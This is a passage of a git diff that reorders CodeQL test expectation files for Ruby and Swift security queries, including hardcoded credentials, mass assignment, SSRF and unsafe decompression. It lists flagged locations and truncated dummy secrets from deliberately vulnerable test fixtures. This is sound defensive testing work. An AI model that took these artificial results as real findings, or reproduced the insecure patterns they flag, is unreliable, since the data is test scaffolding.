chmod | +| FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:67:3:67:34 | call to chmod | call to chmod | +| FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:72:3:72:34 | call to chmod_R | call to chmod_R | diff --git a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected index 4f03b055ad10..a3f4ecb3ae9b 100644 --- a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected +++ b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected @@ -1,15 +1,3 @@ -#select -| HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | This hardcoded value is $@. | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | used as credentials | -| HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | This hardcoded value is $@. | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | used as credentials | -| HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | This hardcoded value is $@. | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | used as credentials | -| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | This hardcoded value is $@. | HardcodedCredentials.rb:1:33:1:36 | cert | used as credentials | -| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." | HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." | HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" | HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." | HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." : String | HardcodedCredentials.rb:31:18:31:23 | passwd | This hardcoded value is $@. | HardcodedCredentials.rb:31:18:31:23 | passwd | used as credentials | -| HardcodedCredentials.rb:43:29:43:43 | "user@test.com" | HardcodedCredentials.rb:43:29:43:43 | "user@test.com" : String | HardcodedCredentials.rb:43:18:43:25 | username | This hardcoded value is $@. | HardcodedCredentials.rb:43:18:43:25 | username | used as credentials | -| HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | HardcodedCredentials.rb:43:46:43:53 | password | This hardcoded value is $@. | HardcodedCredentials.rb:43:46:43:53 | password | used as credentials | edges | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | provenance | | | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | provenance | | @@ -53,3 +41,15 @@ nodes | HardcodedCredentials.rb:43:46:43:53 | password | semmle.label | password | | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | semmle.label | "abcdef123456" : String | subpaths +#select +| HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | This hardcoded value is $@. | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | used as credentials | +| HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | This hardcoded value is $@. | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | used as credentials | +| HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | This hardcoded value is $@. | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | used as credentials | +| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | This hardcoded value is $@. | HardcodedCredentials.rb:1:33:1:36 | cert | used as credentials | +| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." | HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." | HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" | HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." | HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." : String | HardcodedCredentials.rb:31:18:31:23 | passwd | This hardcoded value is $@. | HardcodedCredentials.rb:31:18:31:23 | passwd | used as credentials | +| HardcodedCredentials.rb:43:29:43:43 | "user@test.com" | HardcodedCredentials.rb:43:29:43:43 | "user@test.com" : String | HardcodedCredentials.rb:43:18:43:25 | username | This hardcoded value is $@. | HardcodedCredentials.rb:43:18:43:25 | username | used as credentials | +| HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | HardcodedCredentials.rb:43:46:43:53 | password | This hardcoded value is $@. | HardcodedCredentials.rb:43:46:43:53 | password | used as credentials | diff --git a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected index fb60e7239398..897e8276049f 100644 --- a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected +++ b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected @@ -1,7 +1,3 @@ -#select -| ConditionalBypass.rb:6:8:6:12 | check | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:6:8:6:12 | check | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:8:7:8:29 | call to authenticate_user! | action | ConditionalBypass.rb:3:13:3:18 | call to params | user-provided value | -| ConditionalBypass.rb:14:14:14:27 | ...[...] | ConditionalBypass.rb:14:14:14:19 | call to params | ConditionalBypass.rb:14:14:14:27 | ...[...] | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:14:5:14:9 | call to login | action | ConditionalBypass.rb:14:14:14:19 | call to params | user-provided value | -| ConditionalBypass.rb:27:8:27:8 | p | ConditionalBypass.rb:25:10:25:15 | call to params | ConditionalBypass.rb:27:8:27:8 | p | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:28:7:28:13 | call to verify! | action | ConditionalBypass.rb:25:10:25:15 | call to params | user-provided value | edges | ConditionalBypass.rb:3:5:3:9 | check | ConditionalBypass.rb:6:8:6:12 | check | provenance | | | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:3:13:3:26 | ...[...] | provenance | | @@ -24,3 +20,7 @@ nodes | ConditionalBypass.rb:25:10:25:22 | ...[...] | semmle.label | ...[...] | | ConditionalBypass.rb:27:8:27:8 | p | semmle.label | p | subpaths +#select +| ConditionalBypass.rb:6:8:6:12 | check | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:6:8:6:12 | check | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:8:7:8:29 | call to authenticate_user! | action | ConditionalBypass.rb:3:13:3:18 | call to params | user-provided value | +| ConditionalBypass.rb:14:14:14:27 | ...[...] | ConditionalBypass.rb:14:14:14:19 | call to params | ConditionalBypass.rb:14:14:14:27 | ...[...] | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:14:5:14:9 | call to login | action | ConditionalBypass.rb:14:14:14:19 | call to params | user-provided value | +| ConditionalBypass.rb:27:8:27:8 | p | ConditionalBypass.rb:25:10:25:15 | call to params | ConditionalBypass.rb:27:8:27:8 | p | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:28:7:28:13 | call to verify! | action | ConditionalBypass.rb:25:10:25:15 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected index 11975de723a3..792b17303b10 100644 --- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected +++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected @@ -1,6 +1,3 @@ -#select -| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:5:12:5:15 | resp | Write to file system depends on $@. | http_to_file_access.rb:3:8:3:52 | call to body | untrusted data | -| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params | http_to_file_access.rb:11:18:11:23 | script | Write to file system depends on $@. | http_to_file_access.rb:9:16:9:21 | call to params | untrusted data | edges | http_to_file_access.rb:3:1:3:4 | resp | http_to_file_access.rb:5:12:5:15 | resp | provenance | | | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:3:1:3:4 | resp | provenance | | @@ -16,3 +13,6 @@ nodes | http_to_file_access.rb:9:16:9:30 | ...[...] | semmle.label | ...[...] | | http_to_file_access.rb:11:18:11:23 | script | semmle.label | script | subpaths +#select +| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:5:12:5:15 | resp | Write to file system depends on $@. | http_to_file_access.rb:3:8:3:52 | call to body | untrusted data | +| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params | http_to_file_access.rb:11:18:11:23 | script | Write to file system depends on $@. | http_to_file_access.rb:9:16:9:21 | call to params | untrusted data | diff --git a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected index f859557ffde6..3b23376ac8d1 100644 --- a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected +++ b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected @@ -1,25 +1,3 @@ -#select -| test.rb:8:18:8:28 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:8:18:8:28 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:18:20:18:30 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:18:20:18:30 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:19:21:19:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:19:21:19:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:20:22:20:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:20:22:20:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:21:21:21:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:21:21:21:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:22:22:22:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:22:22:22:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:25:21:25:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:25:21:25:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:26:24:26:34 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:26:24:26:34 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:27:22:27:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:27:22:27:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:28:25:28:35 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:28:25:28:35 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:29:21:29:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:29:21:29:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:31:32:31:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:31:32:31:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:32:33:32:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:32:33:32:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:33:36:33:46 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:33:36:33:46 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:34:32:34:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:34:32:34:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:35:33:35:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:35:33:35:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:36:26:36:36 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:36:26:36:36 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:49:18:49:18 | x | test.rb:47:13:47:18 | call to params | test.rb:49:18:49:18 | x | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:47:13:47:18 | call to params | this remote flow source | -| test.rb:51:18:51:40 | call to permit | test.rb:51:18:51:23 | call to params | test.rb:51:18:51:40 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:51:18:51:23 | call to params | this remote flow source | -| test.rb:52:18:52:69 | call to permit | test.rb:52:18:52:23 | call to params | test.rb:52:18:52:69 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:52:18:52:23 | call to params | this remote flow source | -| test.rb:53:18:53:35 | call to to_unsafe_h | test.rb:53:18:53:23 | call to params | test.rb:53:18:53:35 | call to to_unsafe_h | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:53:18:53:23 | call to params | this remote flow source | edges | test.rb:43:9:43:14 | call to params | test.rb:43:9:43:29 | call to require | provenance | | | test.rb:43:9:43:29 | call to require | test.rb:43:9:43:37 | call to permit! | provenance | Config | @@ -82,3 +60,25 @@ nodes | test.rb:53:18:53:23 | call to params | semmle.label | call to params | | test.rb:53:18:53:35 | call to to_unsafe_h | semmle.label | call to to_unsafe_h | subpaths +#select +| test.rb:8:18:8:28 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:8:18:8:28 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:18:20:18:30 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:18:20:18:30 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:19:21:19:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:19:21:19:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:20:22:20:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:20:22:20:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:21:21:21:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:21:21:21:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:22:22:22:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:22:22:22:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:25:21:25:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:25:21:25:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:26:24:26:34 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:26:24:26:34 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:27:22:27:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:27:22:27:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:28:25:28:35 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:28:25:28:35 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:29:21:29:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:29:21:29:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:31:32:31:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:31:32:31:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:32:33:32:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:32:33:32:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:33:36:33:46 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:33:36:33:46 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:34:32:34:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:34:32:34:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:35:33:35:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:35:33:35:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:36:26:36:36 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:36:26:36:36 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:49:18:49:18 | x | test.rb:47:13:47:18 | call to params | test.rb:49:18:49:18 | x | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:47:13:47:18 | call to params | this remote flow source | +| test.rb:51:18:51:40 | call to permit | test.rb:51:18:51:23 | call to params | test.rb:51:18:51:40 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:51:18:51:23 | call to params | this remote flow source | +| test.rb:52:18:52:69 | call to permit | test.rb:52:18:52:23 | call to params | test.rb:52:18:52:69 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:52:18:52:23 | call to params | this remote flow source | +| test.rb:53:18:53:35 | call to to_unsafe_h | test.rb:53:18:53:23 | call to params | test.rb:53:18:53:35 | call to to_unsafe_h | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:53:18:53:23 | call to params | this remote flow source | diff --git a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected index 26740b5e3f20..c97ff12fc3d0 100644 --- a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected +++ b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected @@ -1,7 +1,3 @@ -#select -| ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:10:32:10:37 | call to params | user-provided value | -| ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | ServerSideRequestForgery.rb:15:33:15:38 | call to params | ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:15:33:15:38 | call to params | user-provided value | -| ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | ServerSideRequestForgery.rb:20:45:20:50 | call to params | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:20:45:20:50 | call to params | user-provided value | edges | ServerSideRequestForgery.rb:10:9:10:28 | users_service_domain | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | provenance | AdditionalTaintStep | | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:10:32:10:60 | ...[...] | provenance | | @@ -18,3 +14,7 @@ nodes | ServerSideRequestForgery.rb:20:45:20:50 | call to params | semmle.label | call to params | | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | semmle.label | ...[...] | subpaths +#select +| ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:10:32:10:37 | call to params | user-provided value | +| ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | ServerSideRequestForgery.rb:15:33:15:38 | call to params | ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:15:33:15:38 | call to params | user-provided value | +| ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | ServerSideRequestForgery.rb:20:45:20:50 | call to params | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:20:45:20:50 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected index 67bfd8f8762d..20be59524bfa 100644 --- a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected +++ b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected @@ -1,6 +1,3 @@ -#select -| decompression_api.rb:5:31:5:34 | path | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:5:31:5:34 | path | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:5:9:5:35 | call to inflate | inflate | -| decompression_api.rb:15:31:15:43 | ...[...] | decompression_api.rb:15:31:15:36 | call to params | decompression_api.rb:15:31:15:43 | ...[...] | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:15:9:15:44 | call to open_buffer | open_buffer | edges | decompression_api.rb:4:9:4:12 | path | decompression_api.rb:5:31:5:34 | path | provenance | | | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:4:16:4:28 | ...[...] | provenance | | @@ -14,3 +11,6 @@ nodes | decompression_api.rb:15:31:15:36 | call to params | semmle.label | call to params | | decompression_api.rb:15:31:15:43 | ...[...] | semmle.label | ...[...] | subpaths +#select +| decompression_api.rb:5:31:5:34 | path | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:5:31:5:34 | path | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:5:9:5:35 | call to inflate | inflate | +| decompression_api.rb:15:31:15:43 | ...[...] | decompression_api.rb:15:31:15:36 | call to params | decompression_api.rb:15:31:15:43 | ...[...] | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:15:9:15:44 | call to open_buffer | open_buffer | diff --git a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected index 47477a9aa60f..013959ee4505 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected +++ b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected @@ -1,6 +1,3 @@ -#select -| UnsafeUnpack.swift:64:27:64:27 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:64:27:64:27 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | -| UnsafeUnpack.swift:67:39:67:39 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:67:39:67:39 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | edges | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:62:60:62:60 | source | provenance | Config | | UnsafeUnpack.swift:62:60:62:60 | source | UnsafeUnpack.swift:64:27:64:27 | source | provenance | | @@ -11,3 +8,6 @@ nodes | UnsafeUnpack.swift:64:27:64:27 | source | semmle.label | source | | UnsafeUnpack.swift:67:39:67:39 | source | semmle.label | source | subpaths +#select 